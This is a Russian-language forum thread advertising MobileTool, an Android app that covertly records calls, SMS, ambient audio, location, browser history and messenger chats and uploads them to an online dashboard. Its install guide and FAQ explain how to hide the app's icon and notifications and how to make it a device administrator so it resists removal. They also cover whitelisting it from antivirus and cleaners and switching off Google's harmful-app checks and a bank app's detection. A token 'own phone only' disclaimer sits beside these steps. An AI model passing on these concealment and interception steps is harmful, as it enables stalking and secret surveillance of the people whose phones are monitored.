MobileTool | Скрытая запись звонков, SMS, координат и др.



Реп: (32)
MobileTool
версия: 25.200

Последнее обновление программы в шапке: 30.06.2021

Прикрепленное изображениеПрикрепленное изображение

Скриншоты
Прикрепленное изображение
Прикрепленное изображение


Краткое описание:
Приложение MobileTool позволяет записывать звонки, SMS, MMS, местонахождением телефона, вести запись окружения и многое другое.

Описание:
Приложение умеет:

1) Делать записи телефонных разговоров и высылать их в личный кабинет пользователя (данные хранятся на хостинге системы). На системах Android 10+ запись звонков может не работать. Пробуйте канал записи 6 и не забудьте дать программе доступ к специальным возможностям.
2) Определять координаты телефона по вышкам сотовой сети, IP, WI-FI и накладывать их на карты Yandex и Google. В личном кабинете можно посмотреть схему перемещений телефона за выбранный период. Причем наличие GPS в телефоне не обязательно!
3) Перехватывать входящие и исходящие SMS-сообщения, входящие и исходящие MMS-сообщения, в том числе и MMS с прикрепленными картинками.
4) Записывать окружение телефона (незаметное включение диктофона на телефоне).
5) Позволяет управлять прослушиваемым телефоном через короткие SMS с телефона администратора.
6) Перехватывать историю встроенного web-браузера.
7) Скачивать телефонную книгу (список всех контактов).
8) Само умеет включать передачу данных (на большинстве телефонов), причем незаметно в тот момент, когда пользователь не пользуется телефоном.
9) Приложение не использует мобильный трафик в роуминге и передает данные в роуминге только через WI-FI.
10) Собирать данные при отсутствии подключения к интернету, а при его появлении - передавать данные.
11) Приложение привязывается к конкретному телефону, а не к SIM-карте, и успешно работает на телефонах с несколькими SIM-картами.
12) Удалять свой ярлык из списка приложений.
13) Просматривать фотографии.
14) Делать снимки.
15) Скриншот экрана.
16) Осуществлять антикражные функции (блокировка аппарата, включение сирены, снимок с фронтальной камеры при разблокировке, очистка пользовательских данных).
17) В версии 25.15+ можно читать переписку некоторых мессенджеров даже без рута.

В root-версии реализованы дополнительные возможности записи сообщений из мессенджеров, агрегаторов, почтовых программ (WhatsApp, Skype, Viber, Hangouts, Агент@mail.ru, Вконтакте, Одноклассники и т.д.)

Доступ к данным - через сайт. Все данные передаются с телефона в личный кабинет пользователя. Сайт и личный кабинет имеют адаптивный дизайн. Это значит, что сайт отображается удобно и понятно на разных устройствах (компьютерах, планшетах, мобильных телефонах).

--------------------------------------
Условия использования

Первые 3 дня (с момента установки и активации приложения) – бесплатно! После двух дней пробного использования – за деньги (скидка 5-20% в зависимости от продолжительности оплачиваемого периода). Оплатить можно в личном кабинете электронными деньгами, карточкой, через платежные терминалы и множеством других способов.
Действующие тарифы.

Инструкции по оплате и решение проблем

Внимательно ознакомьтесь с разделом "Юридическая информация"!
-------------------------------------

Демонстрация
Описание и скриншоты http://mtoolapp.biz/vozmozhnosti/


УСТАНОВКА
Установка зависит от версии Android. На Android до версии 6 все достаточно просто, на 6+ есть дополнительные рекомендации.
1. Регистрируетесь http://my.mtoolapp.biz/hotreg
2. Добавляете телефон в личном кабинете. Получаете уникальный номер IDS для телефона, на котором будет работать приложение.
3. Устанавливаете приложение на телефон, который нужно контролировать. Запоминаем название приложения, запускаем, вводим в свой уникальный код IDS. Жмем Login и ждем появления экрана настроек. Приложение установлено, ярлык удален. На экране настроек можно выбрать нужные вам настройки. Это можно сделать и позже в кабинете пользователя на сайте. Не ставьте без крайней необходимости короткий период загрузки (1 минута или "срочная загрузка"), это может привести к неустойчивой работе программы не некоторых аппаратах.
Дальше нужно сделать так, чтобы приложение жило максимально долго. Рекомендуется по своему производителю аппарата читать ЗДЕСЬ. Если не можете читать на английском, воспользуйтесь Google translate.
4. Идем в менеджер приложений (Настройки -> Приложения). Смотрим, не установлен ли Сбербанк. Если установлен, то находим наше и отключаем в его разрешениях чтение SMS (это можно сделать только на Android 6+). После этого проверяем не убил ли Сбербанк уже нашу прогу (*IDS#).
5. Если на аппарате Android 6+, ищем раздел "Батарея" или нечто подобное. В нем может быть список приложений. Если список есть, находим наше приложение и устанавливаем ему статус "без энергосбережения". Название этой настройки отличается на разных аппаратах, так что ищите по смыслу.
6. В некоторых китайских аппаратах, например Xiaomi, есть свои "уникальные" настройки. В Xiaomi это ярлык "Безопасность" на рабочем столе. В нем нужно найти раздел "Автозагрузка" и включить переключатель напротив нашего приложения. Аналогично для Huawei и Honor читайте под спойлером HUAWEI.
7. Идем в менеджер приложений (Настройки -> Приложения). Находим наше, тыкаем на него и смотрим что есть по настройкам. Здесь может быть переключатель "Автозагрузка" (включаем, если не включен). Ниже будет раздел "Уведомления", заходим в него и выставляем "Отключить все уведомления".
8. Здесь же в менеджере приложений прикидываем есть ли какой-нибудь оптимизатор памяти. Чаще всего это CleanMaster. Запускаем его с рабочего стола, находим настройках список исключений и добавляем в него MT.
9. Запускаем экран настроек через *IDS#. Кликаем на "Защита". Появляется окно для добавления приложения в администраторы. Соглашаемся. Если сработало, то приложение добавится в список администраторов и его будет сложнее удалить (работает не везде, но рекомендуется пробовать).
10. Также можно предоставить программе специальные возможности (версия 25.15+) для чтения сообщений некоторых мессенджеров без рут доступа. Идем в настройки-специальные возможности (Accessibility), включаем переключатель напротив программы, соглашаемся на предоставление разрешений.
11. Ура, все готово!

Рекомендации
Расход трафика приложением в среднем 120-600 мегабайт в месяц. Рекомендуем покупать пакеты предоплаченного трафика не менее 500 мегабайт, а лучше использовать пакет без лимита трафика.

Предпочтительно использовать приложение на телефонах со стандартом связи UMTS (3G) или HSPA (3.5G), т.к. они имеют возможность отправить данные максимально быстро.

Желательно, чтобы телефон имел внутреннюю память достаточного объема (4 Гб и более) помимо дополнительно подключаемой SDCARD с возможностью установки приложений на внутреннюю память.

Желательно включить на телефоне передачу данных и не выключать ее, т.к. не на всех телефонах приложение имеет возможность включить передачу данных самостоятельно.

Вопросы по установке, настройке, некорректной работе
Продвинутая система мгновенной помощи на сайте, доступная из личного кабинета. Используйте ее: http://my.mtoolapp.biz/

Юридическая информация
Приложение распространяется как есть, на бесплатной основе. Плата взымается за услуги хранения информации, собранной приложением, согласно действующим тарифам.

Важно помнить, что приложение можно устанавливать только на собственный телефон. Нельзя использовать приложение для несанкционированного доступа к чужой информации. В противном случае Вы нарушаете законодательство большинства стран СНГ и вся ответственность ложится на Вас.

Поскольку мы технически не можем проверить, на чужой или свой телефон устанавливается приложение, - мы надеемся на Вашу честность.

Полный текст соглашения.

УСТАНОВКА НОВОЙ ВЕРСИИ
1. Перед установкой новой версии нужно удалить старую. Для этого в менеджере приложений выберите приложение и нажмите кнопку "Удалить" (Delete). В root-версии после отработки "Спрятать" удаление производится из экрана настроек (Удалить => потребуется перезагрузка).
2. Никогда не устанавливайте программу заново поверх старой. Это может привести к непредсказуемой неработоспособности программы (данные не будут заливаться на сервер и т.д.).
3. Если не удается удалить из менеджера приложений, то проверьте в списке администраторов (Безопасность=>Администраторы) и снимите галку напротив него. После этого можно будет удалить приложение стандартным образом.
4. Начиная с версии 21, есть возможность экстренной загрузки данных из экрана настроек (Загрузить данные), т.е. исключена потеря данных при переустановке.

SAMSUNG
Есть информация, что в Samsung S9, S9+ на системном уровне запрещена запись звонков. Возможно, что уже вышли соответствующие обновления и для младших версий (S8, S7).
Появилась информация, что и для других моделей Samsung вышли обновления прошивок, где запрещена запись во время звонка. Также в целом на самсунгах могут быть проблемы с записью вообще (искаженный звук).

Удаление системных приложений без рут
Здесь описывается как без получения рут удалить ненужные системные приложения. Работает не везде ,но можно пробовать.
Может быть полезно для удаления оптимизатора Avast из аппаратов Honor, Huawei.

Проблемы с соединением
Много возникает вопросов по поводу "не присылает данные, не все приходит и пр."
Иногда наш сервер глючит. В этом случае вообще не приходит ничего. Тестирование доступности канала проходит постоянно.
Иногда просто данные идут не стабильно на некоторых аппаратах.

Здесь может быть несколько причин:
1. Мобильный интернет - это не домашняя соска Ethernet. На мобильных вышках ограниченное количество каналов, которые могут закончиться и инет пропадет на некоторое время. Это так, упрощенно. Т.е. это соединение не всегда стабильно. Мой опыт просмотра обычных страниц где-нибудь в городе это подтверждает. Иногда нихрена не открывается по 5-10 минут.
2. Сейчас у мобильных операторов пошла мода на оптимизацию работы инета, который они раздают. Шлюзы настраиваются таким образом, что в первую очередь пропускается трафик вских ютубов, сервисов гугла и все такое. Наш трафик в это не попадает никак. В результате иногда при загрузке сети доступ к нашему сервису может идти с задержками.
2.1. Всякие мессенджеры и прочая херня работает так стабильно, потому что они работают через сервис сообщений гугла FireBase (смотри п.2 в том числе). Мы этот сервис не можем использовать, надеюсь понятно почему.
2.2. Такая настройка сети опретаром - это по сути предоставление урезанной услуги, т.к. по нестандартным портам работает не только МТ, но и многие другие сервисы, например устройства телеметрии транспорта и технологических объектов тоже шлют данные на произвольный адрес и на произвольный порт.
3. Иногда бывает, что аппарат подключен к Интернет по старому медленному соединению: EDGE, GPRS. Если в разделе кабинета "Информация об устройстве" вы видите тип сети такой, то это сигнал, что "тяжелые" данные (аудиозаписи) и даже вообще какие-либо данные могут не передаться на сервер. Хорошее по скорости соединение: HSUPA, HSDPA, HSPA, HSPA+, LTE.
4. Сейчас стали популярны VPN-сервисы для обхода блокировок Telegram и других ресурсов. К сожалению часто эти VPN-сервисы (особенно бесплатные) предоставляют некачественную услугу, когда связь нестабильна, многие порты заблокированы и т.д. В этом случае иногда приложение не может нормально заслать данные, особенно, если речь идет о мегабайтах записей.

HUAWEI, Xiaomi и прочее китайское г
Некторые китайские товарищи решили, что можно отступать от спецификации Google Android как угодно и внедрили свою собственную оптимизацию. Они решили, что на аппарате должны работать только системные приложения и те, которые пользователь запустит вручную, а когда фоновый процесс останавливать, решает системный оптимизатор. Это никак не сочетается с документаций для разработчиков Android, поэтому часто на аппаратах HUAWEI наше приложение живет от 3-х часов до 1 суток. В данном случае нужно либо удалять оптимизатор вручную (смотри спойлер "Удаление системных приложений без рут") либо что-то настраивать. Вот один из пользователей поделился инструкцией по настройке.

Вот на русском:
Манипуляции:
"Настройки > Батарея > Запуск > Отключить автоматическое управление и выставить управление вручную с включением всех функций (автозапуск, косвенный запуск, работа в фоне).
"Настройки > Приложения > Специальный доступ > Игнорировать оптимизацию батареи > Все приложения > Изменить статус приложения в списке".

Huawei P40 Lite E (версия EMUI 10.1.0, Android 10):
1. Устанавливаем МТ, но не логинимся.
2. Настройки > Батарея > Запуск приложений > Отключить автоматическое управление и выставить управление вручную с включением всех функций МТ (автозапуск, косвенный запуск, работа в фоне).
3. Настройки > Конфиденциальность > Диспетчер прав > Специальный доступ > Игнорировать оптимизацию батареи > Все приложения > Изменить статус МТ на "запрещено". Если не получается найти (в моем почему-то не было этого раздела, но через настройки или прогу открывались), то ищите поиском по настройкам (оптимизация) или вызывайте это меню из окна настроек программы (настройка батареи).
4. Запускаем МТ, вводим IDS, логинимся.

Xiaomi (проверено и работает на Xiaomi Redmi 9, версия MIUI Global 11.0.4, Android 10):
1. Настройки - о телефоне - версия miui - на версию тычем раз пять - появится надпись "Вы разработчик". Заходим в настройки - расширенные настройки - вниз листаем, находим "для разработчиков", листаем в самый низ и выключаем выключаем оптимизацию MIUI.
2. Далее на рабочем столе находим ярлык "безопасность", верхний правый угол - находим шестеренку - антивирус - сигнатуры - переводим на АVL.
3. Перезагружаем тел. После этого ставим МТ, настраиваем параметры энергосбережения, уведомления, права на автозапуск.

Некоторые пользователи имеют успешный опыт с перемещением приложений в системные с помощью этой программы. На системах 9+ для установки в системную область можно использовать модуль в magisk app systemizer.
В системных приложениях сяоми встречается такое: MI system cleaner. Его мождно выпилить из системы (смотри спойлер "Удаление системных приложений без рут", команда: pm uninstall -k --user 0 com.miui.cleanmaster).
Взято отсюда.

Старайтесь не устанавливать короткие периоды таймеров МТ (сбор координат, выгрузка данных), т.к. в этом случае могут сработать встроенные системные политики, которые не настраиваются, и приложение может быть отправлено в паузу. Рекомендуемые периоды: 30 и более минут.



Требуется Android: 4.0.3+ / 5.0+
Русский интерфейс: Да

Разработчик: MobileTool
Домашняя страница: https://mobiletool.ru https://mtoolapp.biz, https://mtoolapp.net


Скачать:
версия: 25.200 MobileTool (Пост #107712556)

Скачать:
версия: 25.200 ROOT MobileTool (Пост #107712556)

Кому нужно приложение с оригинальной иконкой и названием, есть сборщик в кабинете: раздел меню "Создать приложение".

ИНСТРУКЦИЯ

Внимание! Посты с обсуждением установки программы на чужие телефоны будут удаляться! Программа предназначена для сбора и анализа данных на собственных телефонах, а также помощи в возврате телефона в случае его кражи (пп 5.3.3 и 5.3.4 договора оферты). Если выяснится, что программа установлена на чужой телефон, то будет блокироваться аккаунт на сервере!

Внимание! Начиная с версии 18, изменилась система команд. Теперь управление идет через сервер. После обновления смотрите подробности в меню телефона в разделе "Управление".
Внимание! В Android 5+ убрали возможность программного включения мобильного интернета. Все еще продолжает работать на некоторых рутованных при установке в системную область (на экране настроек: "Спрятать")
Внимание! При удалении IDS из кабинета оставшиеся дни перечисляются обратно на баланс кабинета автоматически.
Внимание! Для пополнения баланса используйте кабинет пользователя с выбором платежной системы. Не пытайтесь переводить деньги напрямую через банковский платеж. У нас все платежи идут через платежную систему: только в этом случае они попадают нам на счет, и мы можем пополнить баланс кабинета.
Внимание! Сервис не работает в Беларуси! Не пытайтесь обойти это ограничение. Только деньги потеряете.

FAQ
Q: Как мне найти приложение в списке установленных?
A: Название приложения периодически меняется (с выходом новых версий), т.е. внимaтельно смотрите что написано в титуле окна логина при установке.

Q: Как вызвать экран настроек?
A: В номеронабирателе набираем *IDS# - звонить. IDS в данном случае - это регистрационный номер программы из кабинета пользователя. В некоторых аппаратах экран настроек появляется на короткое время, но потом он пропадает и появляется сообщение про USSD-запрос. В этом случае можно попробовать отключить временно мобильную сеть (режим самолета) и снова набрать *IDS# - звонок.

Q: Как установить новую версию, если у меня уже работает старая?
A: Установка новой версии приложения делается вручную только после удаления строй версии. Чтобы не потерять накопленные данные, нужно вызвать экран настроек и нажать "Загрузить данные". После этого удаляем приложение из списка установленных в системе, а потом устанавливаем новую версию.

Q: Что делать, если я не могу удалить приложение, т.к. кнопка "Удалить" неактивна?
A: Это значит, что приложение находится в списке администраторов. Зайдите в Настройки - Безопасность - Администраторы. Если приложение там есть, то снимите галочку напротив него. После этого можно удалить, как обычно.

Q: Что делать, если после вызова *IDS# появляется сообщение типа "Выполняется USSD запрос" вместо экрана настроек?
A: Это значит, что по какой-то причине приложение убито полностью. Полностью убить приложение может пользователь или другое приложение (оптимизатор памяти, антивирус, системный сервис и т.д.). В этом случае можно только полностью переустановить приложение (удалить то, что есть, и установить заново).

Q: У меня приложение периодически перестает передавать данные. Что делать?
A: Несколько вариантов (рекомендуется проверить все):
- если экран настроек не вызывается, то сразу в переустановку (разбираться кто его убил)
- проверить оптимизатор энергопотребления системы. Например, в некоторых самсунгах есть настройка Smart Manager, где в разделе "батарея" в списке приложений можно настроить по каждому приложению будет ли оно остановлено через X дней автоматически, если пользователь не запускал визуальную часть.
- добавить приложение в список исключений антивирусов
- добавить приложение в список исключений оптимизатора памяти (CleanMaster и пр.)
- отключить в настройках приложения сбор всей информации, кроме звонков и SMS
- установить более длинный период синхронизации с сервером (не стоит ставить 1 и 5 минут, лучше 15 или 30)

Q: Не все звонки записываются. Что делать?
A: Чаще всего проблема с записью звонков появляется из-за программ, которые могут блокировать запись (Viber, Skype, записывалка голоса и прочее). Исключения составляют случаи, когда не пишутся все исходящие (или входящие) звонки - в этом случае проблема в самой системе, которая не генерирует нужную для записи последовательность событий. Рекомендуется также
проверить канал записи звука: не все они рабочие.

Q: Не все задания из кабинета выполняются. Что делать?
A: Прежде всего нужно понимать, что задания на аппарат поступают только после связи программы с сервером. Во-вторых, нужно помнить, что Android не гарантирует выполнение заданий в точно заданное время, поэтому не нужно задавать время заданий встык, а делать между ними промежуток 3-5 минут. В-третьих, некоторые задания могут не выполниться, если они конфликтуют с
чем-то (снимок камеры во время звонка, запись диктофона во время звонка и пр.).
Есть информация, что запись может блокировать приложение «ЭКРАН БЛОКИРОВКИ EMOJi».

Q: Если МТ пишет диктофонную запись, то другие программы (камера, голосовые сообщения мессенджера и т.д.) не могут работать. Что делать?
A: Если у вас Андройд 10+, то попробуйте выставить канал записи диктофона 6 (программа должна иметь при этом права на специальные возможности). При более старых системах ничего не поделаешь, т.к. любое совместное использование канала записи вызывает конфликт.

Q: Программа "Сбербанк" ругается на приложение, что оно опасно и убивает его. Что делать?
A: Эта проблема известна. "Сбербанк" считает, что приложения, которые имеют доступ к SMS опасны. В Android 6x можно отключить в менеджере приложений разрешение на доступ к SMS. Для других версий Android рекомендуется на свой страх и риск использовать патченную версию "Сбербанка".

Q: Как работает кнопка "Защита" в экране настроек?
A: Эта кнопка добавляет программу в список администраторов. При нормальной работе должно появиться окно со списком разрешений администратора, которые программа запрашивает. Функции администратора позволяют реализовать антикражные функции (блокировка экрана с паролем, хардресет).

Q: Как работает опция "Приоритет диктофона"?
A: По-умолчанию эта опция отключена (звонок прерывает диктофонную запись). Включение опции означает, что диктофонная запись не будет отключаться при начале телефонного разговора. В этом случае файл диктофонной записи в кабинете будет связан со звонком. Нужно помнить, что запись разговора не прерывается диктофонной и, если задание диктофона должно начаться во время
записи звонка, то это задание будет проигнорировано.

Q: Синхронизация с сервером выполняется крайне нечетко, а также задания выполняются не вовремя.
A: Синхронизация с сервером зависит от наличия подключения к Интернет. Если приложение не может включать мобильный Интернет на устройстве (на всех устройствах с Android 5+), то передача данных будет только через WiFi или в том случае, если пользователь сам включит мобильную передачу данных. Второй фактор - это оптимизация использования батареи, которая особенно агрессивно стала применяться в Android 6x. Изучите меню аппарата, касающееся оптимизации использования батареи. Скорее всего там можно будет поставить приложение в список, к которому оптимизация не применяется.

Q: Как работает настройка "Стабилизация"?
A: Настройка "Стабилизация" состоит из трех опций: всегда, критические операции, отключено. Система отключает выполнение всех программ, кроме системных, сразу, как гаснет экран. В тоже самое время программе нужно иногда завершить какие-то действия. Еще система в любой момент может убить программу с целью очистки памяти, а нам нужно звонок записывать, например. Для этого существует режим стабилизации, в котором система с большой вероятностью приложение не убьет. Проблема в том, что в этом случае отображается пустое уведомление в верхней области экрана. Постоянная стабилизация на некоторых аппаратах вызывает быстрый разряд батареи, но уведомление отсутствует. В любом случае, экспериментируйте. В версии 25 настройка "стабилизация" служит для дополнительной стабилизации загрузки данных, например. Отключить пустое уведомление вверху экрана можно в настройках в менеджере приложения: заходим в менеджер приложений, кликаем на нашем приложении и в разделе "уведомления" отключаем показ их.

Q: Нестабильно работает рут-версия. Программа постоянно перестает выходить на связь с сервером.
A: Если Вы собрались установить рут-версию, прежде всего рекомендуется разобраться каким образом получен рут на данном аппарате. Рекомендуется рутовать аппарат через прошивку загрузчика и установку SU через рекавери. Для этого ищите соответствующую ветку с прошивками для своего телефона. Различные программы для простого получения рута типа KingaRoot и прочие, могут работать нестабильно либо требовать дополнительных настроек, не всегда очевидных. Смотрите внимательно настройки SU: рекомендуется выбрать действие "Предоставить" при запросе root-доступа, т.к. на некоторых аппаратах наблюдается периодическое зависание программы без этого разрешения. Рекомендуется в принципе выставить все разрешения в SU на максимум.

Q: Что происходит с программой, если закончились дни на IDS?
A: Когда дни заканчиваются, то и сбор данных прекращается. Программа просто в период синхронизации запрашивает у сервера данные - не появились ли дни. Как только дни >0, функционал восстанавливается.
Если удалить IDS в кабинете, то программа остановится навсегда. Root-версия попытается себя удалить.

Q: Отправляю сообщения со свой странички в Одноклассники, но они не появляются в кабинете. Что делать?
A: Программа собирает данные только из приложении Одноклассники, OK и прочих, установленных на аппарате. Сообщения, отправленные через Web-формы, не могут быть перехвачены.

Q: В области уведомлений появляется системное сообщение, что приложение является потенциально опасным.
A: Google вспомнил про "безопасность". В настройках аппарата есть раздел Google->Безопасность. В этом разделе нужно найти пункты, отвечающие за проверку потенциально опасных программ и отключить их.

Q: Не могу прослушать звонки. Почему? Вернее один прослушала а следующие за ним не могу.
A: Для прослушивания рекомендуется скачивать записи на компьютер и прослушивать с помощью BSPlayer. Иногда записи приходят с задержкой. В этом случае скачанные записи будут пустые. Нужно просто дождаться пока все не докачается.

Q: Каков порядок расходования средств? Могу ли я тратить дни частями, когда мне нужно?
A: На общий баланс кабинета зачисляются купленные дни. Дальше на нужное устройство с общего баланса можно зачислить сколько нужно дней. Программа определяет положительный баланс и начинает сбор данных. Как только дни закончились, сбор информации прекращается. Дни появились - начинается работа опять. Обратите внимание, что иногда платежка тупит и на проводку платежа уходит до 3-5 дней, а иногда все быстро.

Q: С программой творится что-то непонятное: вылетает при запуске, постоянные ошибки и т.д.
A: Проверьте нет ли на аппарате раздела Сервис/Разрешения/Атозапуск (Сервис - ярлык в меню приложений). Добавьте приложение в список, которым разрешен автозапуск. В некоторых прошивках есть настройка "Контроль разрешений", которая позволяет отдельным приложениям выставлять разрешения. Есть особенности на некоторых аппаратах Xiaomi с системой MIUI, про это здесь.

Q: Подскажите, как можно настроить часовые пояса? Время событий в кабинете не совпадает с местным.
A: На телефоне нужно проверить часовой пояс. Принцип такой: все данные регистрируются по UTC. Потом на странице кабинета приводятся к локации системы, в которой броузер запущен. Т.е. в кабинете вы видите в какое время по вашему часовому поясу события произошли. На некоторых аппаратах неправильно настроен часовой пояс, и время просто прикручено к нужному. В этом случае получается, что и время UTC неправильное.
Короче, время должно быть правильно настроено на аппарате, где идет сбор данных и на аппарате где открывается кабинет.

Q: Не пишутся звонки. Записи пустые.
A: Здесь есть несколько вариантов. Первый - это неправильно настроенный канал записи (выставляйте 1 или 4). Второй - это приложение, которое запущено и использует микрофон. Это могут быть разные приложения (некоторые игры в т.ч.). Третий вариант - это неправильная последовательность событий звонка, в результате чего программа не занет когда стартовать запись. На системах 10+ используйте канал записи 6 и специальные возможности для МТ.

Q: Почему некоторые записи истории броузера, email или переписки не видны.
A: Иногда какие-либо параметры могут превышать возможности записи в базу (слишком большой текст, тема, Url и т.д.). В этом случае данные будут отвергнуты сервером и не будут записаны в базу.

Q: В записи звонков не слышно собеседника. Что делать?
A: Слышно или не слышно собеседника зависит от канала записи. Идеальный канал - 4, но он работает далеко не везде. Каналы 1 и 5 - это микрофоны, т.е. с них запишется то, что в них попало (зависит исключительно от конструкции аппарата). Рекомендуется писать в MP3, т.к. запись получится более качественная и потом ее можно будет подредакторовать в Sound Forge или Audacity, чтобы сделать голос собеседника более отчетливым. Еще кому-то помогали задержки перед стартом записи или изменение события старта записи.

Q: Телефон был выключен, но после его включения приложение не выходит на связь.
A: На новых системах (Android 7+) при наличии пароля на вход (блокировки отпечатком и пр.), требуется разблокировка аппарата после перезагрузки, чтобы сервис заново запустился.

Q: Программа не собирает данные о местоположении. Что делать?
A: На некоторых аппаратах из-за особенности прошивки программа не может получить данные по вышкам. Попробуйте включить службу местоположения в настройках аппарата.


Список сервисов, которые пытается читать ROOT-версия
1. Старые версии VK.
2. KateMobile
3. Whatsapp
4. Skype
5. Viber
6. Odnoklassniki
7. Twitter
8. IM+
9. ICQ
10. Telegram
11. Chrome Browser
12. OperaMini Browser
13. Opera Browser
14. FireFox Browser
15. Dolphin Browser
16. Yandex Browser
17. Gmail
18. MailRU
19. YahooMail
20. YandexMail

Иногда что-то перестает работать временно или навсегда. Пишите, если что.


Отключение очистки памяти в некоторых аппаратх
Улучшенный способ отключения встроенных чистилок системы CLEANER на андройдах
Для отключения чистилок Cleaner использовалась программа:
MyAndroidToolsPro
Ссылка на программу под видео


Прошлые версии
версия: 8 [attachment="3768624:mobiletool_8.apk"]
версия: 12 MobileTool (Пост #29437928)
версия: 13 MobileTool (Пост #29986349)
версия: 14 MobileTool (Пост #30892437)
версия: 14beta ROOT MobileTool (Пост #30892688)
версия: 15 MobileTool (Пост #31077530)
версия: 15beta ROOT MobileTool (Пост #31077530)
версия: 16 MobileTool (Пост #31763222)
версия: 16 ROOT MobileTool (Пост #31763222)
версия: 17 MobileTool (Пост #32042371)
версия: 17 ROOT MobileTool (Пост #32042371)
версия: 18 MobileTool (Пост #33474902)
версия: 18 ROOT MobileTool (Пост #33474902)
версия: 19 MobileTool (Пост #33631073)
версия: 19 ROOT MobileTool (Пост #33631073)
версия: 20 MobileTool (Пост #34144342)
версия: 20 ROOT MobileTool (Пост #34144342)
версия: 21 MobileTool (Пост #36540694)
версия: 21 ROOT MobileTool (Пост #36540694)
версия: 22 MobileTool (Пост #49917080)
версия: 22 ROOT MobileTool (Пост #49917080)
версия: 23 MobileTool (Пост #49012097)
версия: 23 ROOT MobileTool (Пост #49384447)
версия: 24 MobileTool (Пост #50034929)
версия: 24 ROOT MobileTool (Пост #50034929)
версия: 25.14 MobileTool (Пост #78110196)
версия: 25.14 ROOT MobileTool (Пост #78110196)
версия: 25.15 MobileTool (Пост #80867589)
версия: 25.15 ROOT MobileTool (Пост #80867589)
версия: 25.17 MobileTool (Пост #81903707)
версия: 25.17 ROOT MobileTool (Пост #81903707)
версия: 25.183 MobileTool (Пост #85479213)
версия: 25.183 ROOT MobileTool (Пост #85479213)
версия: 25.184 MobileTool (Пост #88562666)
версия: 25.184 ROOT MobileTool (Пост #88562666)
версия: 25.191 MobileTool (Пост #90765846)
версия: 25.191 ROOT MobileTool (Пост #90765846)
версия: 25.192 MobileTool (Пост #90765846)
версия: 25.192 ROOT MobileTool (Пост #90765846)
версия: 25.193 MobileTool (Пост #96918971)
версия: 25.193 ROOT MobileTool (Пост #96918971)
версия: 25.195 MobileTool (Пост #97811441)
версия: 25.195 ROOT MobileTool (Пост #97811441)
версия: 25.196 MobileTool (Пост #98064227)
версия: 25.196 ROOT MobileTool (Пост #98064227)
версия: 25.197 MobileTool (Пост #98222253)
версия: 25.197 ROOT MobileTool (Пост #98222253)
версия: 25.198 MobileTool (Пост #101988035)
версия: 25.198 ROOT MobileTool (Пост #101988035)


Про версии 24.X и 25.X
Версии 24 и 25 принципиально отличаются протоколом загрузки. Протокол предполагает пакетную загузку данных частями, что повышает стабильность загрузки через мобильную сеть. Новый сервер для версии 25 продолжает дорабатываться и поддерживаться, как и сама версия 25 клиента.
Рекомендую ставить 25.17+. В ней устранены некоторые серьезные ошибки: могли не собираться фотки из-за ошибок поиска каталога; сервис останавливался при низком заряде батареи и не запускался снова, когда заряд был нормальный. Ну и протокол более гибкий, данные грузятся пакетами, а при проблемах с сервером приложение не входит в бесконечный цикл частых безуспешных попыток загрузки.
Но, если аппарат старый с оперативной памятью 512-1024 Мб, то, возможно, лучше версия 24, т.к. памяти она потребляет меньньше, т.е. над отестировать.


Magisk
В версиях Magisk 19.1+ после получения рута для MT нужно пойти в настройки Magisk. В разделе "Суперпользователь" находим в списке МТ, жмем стрелочку вниз и отключаем уведомления и лог. Если этого не сделать, то при каждом запуске в экран логина, мт будет быстро закрываться.


Выбор телефона
По телефонам раскалад такой.
Самые проблемные - это хуавей, т.к. имеют встроенный оптимизатор. В шапке есть информация о его настройке, но не уверен, что на всех моделях и прошивках можно так делать. Сяоми вроде можно настроить, но у меня есть только старый, а что на новых, я не знаю.
Общий принцип такой: чем чище система, тем лучше работа или по крайней мере имеется возможность настройки, чтобы работало. У меня на Андройд 9 работает без проблем месяцами, т.к. система имеет адекватные натройки по энергосбережению. Под чистотой системы понимается процент того что призводитель туда своего зарядил и насколько уважительно он отнесся к спецификации разработчика (пример Хуавей - это то как не надо делать, т.к. такой подход мешает работе не только МТ, но и многих других программ).
Есть аппараты на чистом андройде (Nokia), есть с минимальными доработками (новые Sony, HTC), и на них можно настроить, что МТ будет стабильно работать долго.
На системах до Андройд 6 работало все более-менее стабильно. Дальше начались оптимизации и извращения со стороны производителей. Конкретные модели сложно назвать, т.к. аппаратов очень много разных, и протестировать их все нет возможности.


Не пишутся звонки, диктофон

Начиная с Android 9, официально объявлено о прекращении поддержки записи звонков. На некоторых аппаратах пишется тишина. На Android 10 рекомендуется выставлять канал записи 6 и давать программе доступ к специальным возможностям.

Перевод из западных ресурсов по подобной проблеме.
Все звонки не записываются или качество записи очень плохое или отсутствует, почему?

Есть 5 возможных причин:

В вашем телефоне работает еще один рекордер, который блокирует MT. Android позволяет работать только одному рекордеру, поэтому сначала вы ДОЛЖНЫ удалить ВСЕ другие рекордеры, иначе MT не сможет записывать вызовы.
Вы используете приложение «Voice Assistant», приложение занимает микрофон, оно непрерывно получает звук с микрофона, чтобы распознать вашу «голосовую команду», и это блокирует работу MT. Пожалуйста, отключите приложение Voice Assistant.

Приложение «OK Google» - самый популярный голосовой помощник в телефонах Android, отключите в телефоне следующую опцию:
В некоторых телефонах отключите параметр «Настройки> Google> Поиск> Голос> OK обнаружение Google> С любого экрана».
В некоторых телефонах отключите параметр «Настройки> Google> Поиск> Голос> ОК, обнаружение Google> Скажите, хорошо, Google в любое время».
В некоторых телефонах отключите опцию «Настройки> Google> Поиск> Голос> Голосовое соответствие> Скажи ок, Google в любое время».
В некоторых телефонах отключите параметр «Настройки> Google> Поиск> Голос> Голосовое сопоставление> Разблокировать с помощью голосового сопоставления».

Если вы используете телефон Samsung, проверьте также приложение «Bixby», это собственный голосовой помощник Samsung, вам следует отключить его.
Если вы используете телефон Moto, пожалуйста, проверьте приложение «Moto Voice», это собственный голосовой помощник Motorola, вы должны отключить его.
Если вы используете телефон Huawei, проверьте также приложение «HiVoice», это собственный голосовой помощник Huawei, его следует отключить.
В некоторых телефонах Huawei отключите приложение «HiVoice» следующим образом:
Откройте экран «Настройки> Приложения> HiVoice» и подтвердите, что имя пакета - «com.huawei.vassistant».
Нажмите «Force Stop».
В некоторых телефонах Huawei отключите опцию «Набор номера> Настройки> Быстрый вызов».
В некоторых телефонах Huawei отключите опцию «Контакты> Настройки> Быстрый вызов».
В некоторых телефонах Huawei отключите параметр «Настройки> Smart Assistance> Голосовое управление».
В некоторых телефонах Huawei отключите параметр «Настройки> Приложения> Системные приложения> Голосовой набор».
В некоторых телефонах Huawei, возможно, они находятся в другом месте, при необходимости прочитайте руководство пользователя.
Для других телефонов у производителя есть собственный голосовой помощник, пожалуйста, проверьте его.

